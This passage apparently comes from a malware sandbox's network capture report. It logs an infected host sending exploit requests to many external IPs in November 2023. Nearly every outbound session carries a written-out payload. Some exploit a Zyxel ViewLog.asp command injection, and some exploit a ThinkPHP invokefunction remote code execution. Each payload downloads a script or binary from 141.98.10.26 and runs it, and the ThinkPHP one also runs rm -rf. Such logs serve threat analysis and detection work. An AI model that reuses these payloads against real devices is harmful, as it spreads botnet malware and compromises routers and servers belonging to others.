3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
821	192.168.2.23	38710	95.172.177.232	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.668695927 CET	16956	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
822	192.168.2.23	59020	62.29.53.226	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.692428112 CET	16958	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
823	192.168.2.23	37470	85.240.195.38	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.697531939 CET	16959	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:09.945148945 CET	16969	IN	HTTP/1.1 400 Bad Request Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
824	192.168.2.23	59094	85.72.234.179	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.699090958 CET	16960	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:09.938411951 CET	16969	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:08 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
825	192.168.2.23	55716	95.226.53.130	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.766199112 CET	16962	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
826	192.168.2.23	40104	95.163.97.122	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.783813000 CET	16963	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:10.028582096 CET	16973	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Wed, 22 Nov 2023 07:40:09 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
827	192.168.2.23	35270	95.59.245.231	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.791160107 CET	16963	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:10.041811943 CET	16973	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:40:10.044059992 CET	16974	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
828	192.168.2.23	47116	31.136.106.200	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.851692915 CET	16964	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:10.432188988 CET	17087	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:11.552073956 CET	17158	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:13.823700905 CET	17465	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:18.431096077 CET	18034	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:27.389904976 CET	19070	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:45.819385052 CET	19769	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:22.678131104 CET	19787	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
829	192.168.2.23	42060	31.200.29.5	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.895246029 CET	16966	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
830	192.168.2.23	39098	31.194.8.9	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.899972916 CET	16967	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
831	192.168.2.23	42006	31.0.141.167	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.934223890 CET	16968	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:10.211996078 CET	16989	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 08:40:09 GMT Server: Webs X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1;mode=block Cache-Control: no-store Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
832	192.168.2.23	45418	88.221.137.103	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.950231075 CET	16970	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:10.134684086 CET	16986	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:10 GMT Date: Wed, 22 Nov 2023 07:40:10 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 37 35 61 31 36 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 38 31 30 26 23 34 36 3b 31 38 34 33 61 39 36 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.375a1602.1700638810.1843a96c</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
833	192.168.2.23	56890	88.87.94.98	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.015302896 CET	16972	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:10.247436047 CET	17015	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Wed, 22 Nov 2023 07:40:01 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
834	192.168.2.23	39164	31.206.223.76	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.098751068 CET	16975	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:10.348567009 CET	17024	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 07:40:10 GMT Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port
835	192.168.2.23	51054	95.100.219.220	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.142580986 CET	16987	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:10.514112949 CET	17090	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:10 GMT Date: Wed, 22 Nov 2023 07:40:10 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 35 39 66 33 36 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 38 31 30 26 23 34 36 3b 32 39 38 36 33 37 30 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.c59f3617.1700638810.29863705</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
836	192.168.2.23	37500	85.240.195.38	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.149138927 CET	16987	IN	HTTP/1.1 414 Request-URI Too Large Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
837	192.168.2.23	37798	31.136.100.83	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:10.394484043 CET	17085	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:13.567765951 CET	17449	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
